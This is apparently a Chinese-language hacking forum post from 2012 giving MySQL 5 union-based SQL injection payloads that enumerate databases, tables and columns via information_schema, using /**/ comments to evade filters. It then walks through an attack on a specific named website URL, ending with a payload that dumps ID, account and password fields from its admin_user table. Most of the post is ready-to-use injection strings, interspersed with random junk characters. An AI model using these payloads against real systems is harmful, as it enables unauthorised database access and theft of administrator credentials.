查库
9 j/ C3 O4 }, _! p8 d
& G+ \5 {( @9 k$ S, v! q! G# i+ O4 jid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*2 W2 b6 k8 _$ u7 M4 O
g! P1 P. }, f
查表
9 A+ i1 ] D/ ^3 e) z9 |% g& ^0 G
2 {% f( r l6 b5 \3 N& L" Wid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1+ _0 t, `+ _. P
1 n% {- h1 h, d# x6 Y; D' T
查段, a; ]+ [2 v7 _$ M
, F" \& e ^2 |# K7 l4 c
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
8 ?- }: R8 f7 C+ @( l T1 R7 O' R! O% p2 l
. ~9 t% Z9 i2 {mysql5高级注入方法暴表
: g2 d M6 p3 F1 V4 M
" J5 O* Q- q; j例子如下:9 y5 W6 R* Q, A
9 y- @4 ]. T# {+ I, B
1.爆表
7 B' R$ g5 t+ b* s" g* K# S8 Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet): Q o/ \) j' R! i
这样爆到第4个时出现了admin_user表。! ?5 Y; D: V) y9 \4 d* [7 n/ o. N
* }" N( y# ?/ f2 v
2.暴字段9 U9 e8 c& S: X2 x. h
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
, M: a4 c K/ ~$ b# ]' \$ J
& @* O" T4 @( j" F; `- I
+ P4 E9 R) S0 c3.爆密码4 F1 D! W ~$ s; f
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* , a z- Q1 X: k! j" \
/ ?, p& a. ?1 c4 V, E
, O0 S% }% _4 n# v! U2 {6 [ |
发表于 2012-9-13 16:29:37
收藏
支持
反对